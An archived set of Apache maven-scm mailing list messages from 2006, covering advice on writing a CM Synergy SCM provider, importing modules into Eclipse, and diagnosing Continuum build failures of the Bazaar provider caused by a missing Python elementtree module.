to both maven and maven-scm so bear with me...</font> <br><font size=3D2 face=3D"sans-serif">I have checked out maven-scm from sv= n.</font> <br> <br><font size=3D2 face=3D"sans-serif">What would be the best solution to i= mport this into Eclipse?</font> <br><font size=3D2 face=3D"sans-serif">Should I have each module (maven-scm= -api, maven-scm-providers) as separate Eclipse projects?</font> <br><font size=3D2 face=3D"sans-serif">Eclipse has a different directory st= andard.</font> <br> <br><font size=3D2 face=3D"sans-serif">I'm sorry if these are simple questi= ons, but the documentation of doing this on the web site is quite thin.</font> <br> <br><font size=3D2 face=3D"sans-serif">Regards</font> <br> <br><font size=3D2 face=3D"sans-serif">Henrik</font> <br> <br> <br> <br> <br> <table width=3D100%> <tr valign=3Dtop> <td width=3D35%> <br> <br> <br><font size=3D1 face=3D"sans-serif"><b>&quot;Torbjorn Smorgrav&quot; &lt= ;[email protected]&gt;</b></font> <br><font size=3D1 face=3D"sans-serif">2006-03-22 21:54</font> <br> <table border> <tr valign=3Dtop> <td> <div align=3Dcenter><font size=3D1 face=3D"sans-serif">Please respond to<br> [email protected]</font></div></table> <br> <td width=3D64%> <table width=3D100%> <tr valign=3Dtop> <td> <div align=3Dright><font size=3D1 face=3D"sans-serif">To</font></div> <td><font size=3D1 face=3D"sans-serif">[email protected]</font> <tr valign=3Dtop> <td> <div align=3Dright><font size=3D1 face=3D"sans-serif">cc</font></div> <td> <tr valign=3Dtop> <td> <div align=3Dright><font size=3D1 face=3D"sans-serif">Subject</font></div> <td><font size=3D1 face=3D"sans-serif">Re: Implementing support for CM Syne= rgy?</font></table> <br> <table> <tr valign=3Dtop> <td> <td></table> <br></table> <br> <br> <br><font size=3D2><tt>Hi Henrik!<br> </tt></font> <br><font size=3D2><tt>&gt; I posted this yesterday as well. But I haven't got any response yet. So<br> &gt; I'll ask again.<br> &gt; I want to implement support for CM Synergy.<br> </tt></font> <br><font size=3D2><tt>I'll be happy to help you.<br> I recently added the Bazaar provider (yet to be released) so I can<br> at least guide you through the same path that I took.<br> </tt></font> <br><font size=3D2><tt>&gt; What baseline should I use?<br> </tt></font> <br><font size=3D2><tt>Use the current development baseline.<br> http://maven.apache.org/scm/source-repository.html<br> </tt></font> <br><font size=3D2><tt>&gt; What do I need to check out?<br> </tt></font> <br><font size=3D2><tt>Start with:<br> </tt></font> <br><font size=3D2><tt>maven-scm-api/ &lt;http://svn.apache.org/viewcvs.cgi= /maven/scm/trunk/maven-scm-api/&gt;<br> maven-scm-test/<br> &lt;http://svn.apache.org/viewcvs.cgi/maven/scm/trunk/maven-scm-test/&gt;<b= r> </tt></font> <br><font size=3D2><tt>And a reference provider eg. maven-scm-provider-baza= ar/<br> &lt;http://svn.apache.org/viewcvs.cgi/maven/scm/trunk/maven-scm-providers/m= aven-scm-provider-bazaar/&gt;<br> Perhapes choose one that is most similar to the CM Synergy<br> </tt></font> <br><font size=3D2><tt>&gt; What class or interfaced do I need to implement= ?<br> </tt></font> <br><font size=3D2><tt>What I did was change the implementation of an exist= ing provider.<br> That way I got fast results and I learned the API one step at the time.<br> </tt></font> <br><font size=3D2><tt>Basically what you need to implements is an (Abstrac= t)ScmProvider and<br> its commands.<br> </tt></font> <br><font size=3D2><tt>&gt; How can I test my provider?<br> </tt></font> <br><font size=3D2><tt>1. Run unit tests from your IDE<br> The test classes in maven-scm-test was really helpfull to me. Try to<br> include a tck test<br> as soon as possible. See how the tck tests are implemented in the<br> reference provider (its a no brainer :).<br> </tt></font> <br><font size=3D2><tt>It can be a bit tricky to setup your IDE to pickup your current<br> modifications and not the installed<br> version of the provider. Let me know it this becomes a problem.<br> </tt></font> <br><font size=3D2><tt>2. Build and install the provider and test it with eg. &quot;mvn<br> scm:checkout&quot; on a project where<br> you have defined a scm url in the pom.xml.<br> </tt></font> <br><font size=3D2><tt>This was probably a too short answer. But if you post your questions<br> as they come,<br> I'll do my best to help you. And in the end I like to make a mave-scm<br> howto webpage<br> with all of this.<br> </tt></font> <br><font size=3D2><tt>Good luck,<br> =0ATorbj=F8rn</tt></font> <br><font size=3D2 face=3D"sans-serif">[attachment &quot;C.htm&quot; deleted by Henrik Jonsson/SE/Transport/Bombardier] </font> <br> <br> <br><font size=3D2 face=3D"sans-serif"><br> <br> =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F <br> This e-mail communication (and any attachment/s) may contain confidential or privileged information and is intended only for the individual(s) or entity named above and to others who have been specifically authorized to receive it. If you are not the intended recipient, please do not read, copy, use or disclose the contents of this communication to others. Please notify the sender that you have received this e-mail in error by reply e-mail, and delete the e-mail subsequently. <br> Thank you. <br> =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F <br> <br> Ce message (ainsi que le(s) fichier/s), transmis par courriel, peut contenir des renseignements confidentiels ou prot=E9g=E9s et est destin=E9 =E0 l&#82= 17;usage exclusif du destinataire ci-dessus. Toute autre personne est par les pr=E9s= entes avis=E9e qu&#8217;il est strictement interdit de le diffuser, le distribuer= ou le reproduire. Si vous l&#8217;avez re=E7u par inadvertance, veuillez nous = en aviser et d=E9truire ce message. <br> Merci. <br> =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F= =5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F <br> <br> </font> --=_alternative 00429E56C125713B_=-- From [email protected] Fri Mar 24 12:38:25 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88793 invoked from network); 24 Mar 2006 12:38:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 12:38:25 -0000 Received: (qmail 16653 invoked by uid 500); 24 Mar 2006 12:38:24 -0000 Delivered-To: [email protected] Received: (qmail 16636 invoked by uid 500); 24 Mar 2006 12:38:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 16624 invoked by uid 99); 24 Mar 2006 12:38:24 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 04:38:24 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail-ihug.icp-qv1-irony4.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 04:38:22 -0800 Received: from 203-206-245-117.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by mail-ihug.icp-qv1-irony4.iinet.net.au with ESMTP; 24 Mar 2006 20:37:58 +0800 X-BrightmailFiltered: true X-Brightmail-Tracker: AAAAAA== X-IronPort-AV: i="4.03,125,1141574400"; d="scan'208"; a="670991161:sNHT25323236" Message-ID: <[email protected]> Date: Fri, 24 Mar 2006 23:37:49 +1100 From: Brett Porter <[email protected]> User-Agent: Thunderbird 1.5 (Windows/20051201) MIME-Version: 1.0 To: [email protected] Subject: Re: [continuum] BUILD FAILURE: Maven SCM Bazaar Provider References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N That's probaly it, thanks. - Brett Torbjørn Smørgrav wrote: > Have you tested Bazaar manually? > > Form the test log it clear that every command fails > due to an import error in Bazaar. > > Check if the cElementTree module is installed properly by running: > $ python -c "import cElementTree" > > Torbjørn > > > > -----Original Message----- > From: Brett Porter [mailto:[email protected]] > Sent: 24. mars 2006 08:03 > To: [email protected] > Subject: Re: [continuum] BUILD FAILURE: Maven SCM Bazaar Provider > > > Any ideas on this? bzr 0.7 seems to be properly installed now. Can the > output of the tests be improved? > > - Brett > > Continuum Build Server wrote: >> Online report : > http://ci.codehaus.org/continuum-maven/servlet/continuum/target/ProjectBuild > .vm/view/ProjectBuild/id/66/buildId/714 >> Build statistics: >> State: Failed >> Previous State: Failed >> Started at: Thu, 23 Mar 2006 22:50:10 -0800 >> Finished at: Thu, 23 Mar 2006 22:50:20 -0800 >> Total time: 10s >> Build Trigger: Forced >> Exit code: 1 >> Building machine hostname: cheddar.simulalabs.com >> Operating system : Linux(unknown) >> Java version : 1.5.0_03(Sun Microsystems Inc.) >> >> Changes >> No files changed >> >> > **************************************************************************** >> Output: >> > **************************************************************************** >> [INFO] Scanning for projects... >> > [INFO] --------------------------------------------------------------------- > ------- >> [INFO] Building Maven SCM Bazaar Provider >> [INFO] task-segment: [clean, install] >> > [INFO] --------------------------------------------------------------------- > ------- >> [INFO] [clean:clean] >> [INFO] Deleting directory > /home/nobody/continuum-maven/working-directory/66/target >> [INFO] Deleting directory > /home/nobody/continuum-maven/working-directory/66/target/classes >> [INFO] Deleting directory > /home/nobody/continuum-maven/working-directory/66/target/test-classes >> [INFO] [resources:resources] >> [INFO] Using default encoding to copy filtered resources. >> [INFO] [compiler:compile] >> Compiling 19 source files to > /home/nobody/continuum-maven/working-directory/66/target/classes >> [INFO] [resources:testResources] >> [INFO] Using default encoding to copy filtered resources. >> [INFO] [compiler:testCompile] >> Compiling 7 source files to > /home/nobody/continuum-maven/working-directory/66/target/test-classes >> [INFO] [surefire:test] >> [INFO] Setting reports dir: > /home/nobody/continuum-maven/working-directory/66/target/surefire-reports >> ------------------------------------------------------- >> T E S T S >> ------------------------------------------------------- >> [surefire] Running > org.apache.maven.scm.provider.bazaar.command.checkin.BazaarCheckInCommandTes > t >> EXECUTING: bzr init >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeBazaar version: Unknown >> Working directory: > /home/nobody/continuum-maven/working-directory/66/target/test-branch >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeEXECUTING: bzr add > /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml > /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. > txt > /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai > n/java/Application.java > /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes > t/java/Test.java >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeBazaar version: Unknown >> Working directory: > /home/nobody/continuum-maven/working-directory/66/target/test-branch >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeEXECUTING: bzr init >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeBazaar version: Unknown >> Working directory: > /home/nobody/continuum-maven/working-directory/66/target/test-branch >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeEXECUTING: bzr add > /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml > /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. > txt > /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai > n/java/Application.java > /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes > t/java/Test.java >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeBazaar version: Unknown >> Working directory: > /home/nobody/continuum-maven/working-directory/66/target/test-branch >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTree[surefire] Tests run: 2, Failures: 0, Errors: 2, Time > elapsed: 1.622 sec <<<<<<<< FAILURE !! >> [surefire] Running > org.apache.maven.scm.provider.bazaar.command.checkout.BazaarCheckOutCommandT > est >> EXECUTING: bzr init >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeBazaar version: Unknown >> Working directory: > /home/nobody/continuum-maven/working-directory/66/target/test-branch >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeEXECUTING: bzr add > /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml > /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. > txt > /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai > n/java/Application.java > /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes > t/java/Test.java >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeBazaar version: Unknown >> Working directory: > /home/nobody/continuum-maven/working-directory/66/target/test-branch >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTree[surefire] Tests run: 1, Failures: 0, Errors: 1, Time > elapsed: 0.641 sec <<<<<<<< FAILURE !! >> [surefire] Running > org.apache.maven.scm.provider.bazaar.command.status.BazaarStatusCommandTest >> EXECUTING: bzr init >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeBazaar version: Unknown >> Working directory: > /home/nobody/continuum-maven/working-directory/66/target/test-branch >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeEXECUTING: bzr add > /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml > /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. > txt > /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai > n/java/Application.java > /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes > t/java/Test.java >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeBazaar version: Unknown >> Working directory: > /home/nobody/continuum-maven/working-directory/66/target/test-branch >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTree[surefire] Tests run: 1, Failures: 0, Errors: 1, Time > elapsed: 0.606 sec <<<<<<<< FAILURE !! >> [surefire] Running > org.apache.maven.scm.provider.bazaar.command.diff.BazaarDiffCommandTest >> EXECUTING: bzr init >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeBazaar version: Unknown >> Working directory: > /home/nobody/continuum-maven/working-directory/66/target/test-branch >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeEXECUTING: bzr add > /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml > /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. > txt > /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai > n/java/Application.java > /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes > t/java/Test.java >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeBazaar version: Unknown >> Working directory: > /home/nobody/continuum-maven/working-directory/66/target/test-branch >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTree[surefire] Tests run: 1, Failures: 0, Errors: 1, Time > elapsed: 0.599 sec <<<<<<<< FAILURE !! >> [surefire] Running > org.apache.maven.scm.provider.bazaar.command.update.BazaarUpdateCommandTest >> EXECUTING: bzr init >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeBazaar version: Unknown >> Working directory: > /home/nobody/continuum-maven/working-directory/66/target/test-branch >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeEXECUTING: bzr add > /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml > /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. > txt > /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai > n/java/Application.java > /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes > t/java/Test.java >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeBazaar version: Unknown >> Working directory: > /home/nobody/continuum-maven/working-directory/66/target/test-branch >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTree[surefire] Tests run: 1, Failures: 0, Errors: 1, Time > elapsed: 0.664 sec <<<<<<<< FAILURE !! >> [surefire] Running > org.apache.maven.scm.provider.bazaar.command.changelog.BazaarChangeLogComman > dTckTest >> EXECUTING: bzr init >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeBazaar version: Unknown >> Working directory: > /home/nobody/continuum-maven/working-directory/66/target/test-branch >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeEXECUTING: bzr add > /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml > /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme. > txt > /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/mai > n/java/Application.java > /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/tes > t/java/Test.java >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTreeBazaar version: Unknown >> Working directory: > /home/nobody/continuum-maven/working-directory/66/target/test-branch >> failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' >> [ERROR] exceptions.ImportError: No module named > elementtree.ElementTree[surefire] Tests run: 1, Failures: 0, Errors: 1, Time > elapsed: 0.562 sec <<<<<<<< FAILURE !! > [INFO] --------------------------------------------------------------------- > ------- >> [ERROR] BUILD ERROR >> > [INFO] --------------------------------------------------------------------- > ------- >> [INFO] There are test failures. >> > [INFO] --------------------------------------------------------------------- > ------- >> [INFO] For more information, run Maven with the -e switch >> > [INFO] --------------------------------------------------------------------- > ------- >> [INFO] Total time: 9 seconds >> [INFO] Finished at: Thu Mar 23 22:50:20 PST 2006 >> [INFO] Final Memory: 8M/125M >> > [INFO] --------------------------------------------------------------------- > ------- >> > **************************************************************************** >> > From [email protected] Fri Mar 24 13:20:22 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13813 invoked from network); 24 Mar 2006 13:20:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 13:20:22 -0000 Received: (qmail 76722 invoked by uid 500); 24 Mar 2006 13:20:21 -0000 Delivered-To: [email protected] Received: (qmail 76702 invoked by uid 500); 24 Mar 2006 13:20:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 76691 invoked by uid 99); 24 Mar 2006 13:20:21 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 05:20:21 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Fri, 24 Mar 2006 05:20:20 -0800 Received: (qmail 8020 invoked from network); 24 Mar 2006 13:20:04 -0000 Received: from 251.29.98-84.rev.gaoland.net (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 24 Mar 2006 13:20:04 -0000 Message-ID: <[email protected]> Date: Fri, 24 Mar 2006 14:19:48 +0100 From: Emmanuel Venisse <[email protected]> User-Agent: Mozilla Thunderbird 1.0.6 (Windows/20050716) X-Accept-Language: fr, en MIME-Version: 1.0 To: [email protected] Subject: Re: Implementing support for CM Synergy? References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=windows-1252; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [email protected] a écrit : > > Hi and thanks for the info! > > I'm new to both maven and maven-scm so bear with me... > I have checked out maven-scm from svn. > > What would be the best solution to import this into Eclipse? mvn eclipse:eclipse > Should I have each module (maven-scm-api, maven-scm-providers) as > separate Eclipse projects? yes, all eclipse projects will be generated by eclipse mojo > Eclipse has a different directory standard. yes, with eclipse you can't add pom projects but only jar projects, so you'll need to remove them > > I'm sorry if these are simple questions, but the documentation of doing > this on the web site is quite thin. http://maven.apache.org/plugins/maven-eclipse-plugin/overview.html http://maven.apache.org/plugins/maven-eclipse-plugin/reactor.html Emmanuel > > Regards > > Henrik > > > > > > > > *"Torbjorn Smorgrav" <[email protected]>* > 2006-03-22 21:54 > Please respond to > [email protected] > > > > To > [email protected] > cc > > Subject > Re: Implementing support for CM Synergy? > > > > > > > > > Hi Henrik! > > > I posted this yesterday as well. But I haven't got any response yet. So > > I'll ask again. > > I want to implement support for CM Synergy. > > I'll be happy to help you. > I recently added the Bazaar provider (yet to be released) so I can > at least guide you through the same path that I took. > > > What baseline should I use? > > Use the current development baseline. > http://maven.apache.org/scm/source-repository.html > > > What do I need to check out? > > Start with: > > maven-scm-api/ > <http://svn.apache.org/viewcvs.cgi/maven/scm/trunk/maven-scm-api/> > maven-scm-test/ > <http://svn.apache.org/viewcvs.cgi/maven/scm/trunk/maven-scm-test/> > > And a reference provider eg. maven-scm-provider-bazaar/ > <http://svn.apache.org/viewcvs.cgi/maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/> > Perhapes choose one that is most similar to the CM Synergy > > > What class or interfaced do I need to implement? > > What I did was change the implementation of an existing provider. > That way I got fast results and I learned the API one step at the time. > > Basically what you need to implements is an (Abstract)ScmProvider and > its commands. > > > How can I test my provider? > > 1. Run unit tests from your IDE > The test classes in maven-scm-test was really helpfull to me. Try to > include a tck test > as soon as possible. See how the tck tests are implemented in the > reference provider (its a no brainer :). > > It can be a bit tricky to setup your IDE to pickup your current > modifications and not the installed > version of the provider. Let me know it this becomes a problem. > > 2. Build and install the provider and test it with eg. "mvn > scm:checkout" on a project where > you have defined a scm url in the pom.xml. > > This was probably a too short answer. But if you post your questions > as they come, > I'll do my best to help you. And in the end I like to make a mave-scm > howto webpage > with all of this. > > Good luck, > Torbjørn > [attachment "C.htm" deleted by Henrik Jonsson/SE/Transport/Bombardier] > > > > > _______________________________________________________________________________________________________________ > > This e-mail communication (and any attachment/s) may contain > confidential or privileged information and is intended only for the > individual(s) or entity named above and to others who have been > specifically authorized to receive it. If you are not the intended > recipient, please do not read, copy, use or disclose the contents of > this communication to others. Please notify the sender that you have > received this e-mail in error by reply e-mail, and delete the e-mail > subsequently. > Thank you. > _________________________________________________________________________________________________________________ > > > Ce message (ainsi que le(s) fichier/s), transmis par courriel, peut > contenir des renseignements confidentiels ou protégés et est destiné à > l'usage exclusif du destinataire ci-dessus. Toute autre personne est par > les présentes avisée qu'il est strictement interdit de le diffuser, le > distribuer ou le reproduire. Si vous l'avez reçu par inadvertance, > veuillez nous en aviser et détruire ce message. > Merci. > _________________________________________________________________________________________________________________ > > From [email protected] Tue Mar 28 17:58:55 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 78714 invoked from network); 28 Mar 2006 17:58:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2006 17:58:55 -0000 Received: (qmail 88478 invoked by uid 500); 28 Mar 2006 17:58:50 -0000 Delivered-To: [email protected] Received: (qmail 88389 invoked by uid 500); 28 Mar 2006 17:58:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 88346 invoked by uid 99); 28 Mar 2006 17:58:50 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 09:58:50 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO customer-domains.icp-qv1-irony7.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 09:58:49 -0800 Received: from 203-206-247-19.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by customer-domains.icp-qv1-irony7.iinet.net.au with ESMTP; 29 Mar 2006 01:58:25 +0800 X-BrightmailFiltered: true X-Brightmail-Tracker: AAAAAA== X-IronPort-AV: i="4.03,139,1141574400"; d="scan'208"; a="213385555:sNHT44648776" Message-ID: <[email protected]> Date: Wed, 29 Mar 2006 04:58:17 +1100 From: Brett Porter <[email protected]> User-Agent: Thunderbird 1.5 (Windows/20051201) MIME-Version: 1.0 To: [email protected] Subject: Re: [continuum] BUILD FAILURE: Maven SCM Bazaar Provider References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N bzr seems to be correctly installed now. Anyone have any ideas on this one? - Brett Continuum Build Server wrote: > Online report : http://ci.codehaus.org/continuum-maven/servlet/continuum/target/ProjectBuild.vm/view/ProjectBuild/id/80/buildId/490 > Build statistics: > State: Failed > Previous State: Failed > Started at: Tue, 28 Mar 2006 05:05:12 -0800 > Finished at: Tue, 28 Mar 2006 05:05:42 -0800 > Total time: 29s > Build Trigger: Schedule > Exit code: 1 > Building machine hostname: cheddar.simulalabs.com > Operating system : Linux(unknown) > Java version : 1.5.0_03(Sun Microsystems Inc.) > > Changes > evenisse Formatting > /maven/scm/trunk/maven-scm-api/src/main/java/org/apache/maven/scm/command/add/AddScmResult.java > /maven/scm/trunk/maven-scm-plugin/src/main/java/org/apache/maven/scm/plugin/AbstractScmMojo.java > /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/main/java/org/apache/maven/scm/provider/bazaar/BazaarConfig.java > /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/main/java/org/apache/maven/scm/provider/bazaar/BazaarUtils.java > /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/main/java/org/apache/maven/scm/provider/bazaar/command/changelog/BazaarChangeLogCommand.java > /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/main/java/org/apache/maven/scm/provider/bazaar/command/changelog/BazaarChangeLogConsumer.java > /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/main/java/org/apache/maven/scm/provider/bazaar/command/diff/BazaarDiffConsumer.java > /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/test/java/org/apache/maven/scm/provider/bazaar/BazaarTestUtils.java > /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/test/java/org/apache/maven/scm/provider/bazaar/command/changelog/BazaarChangeLogConsumerTest.java > 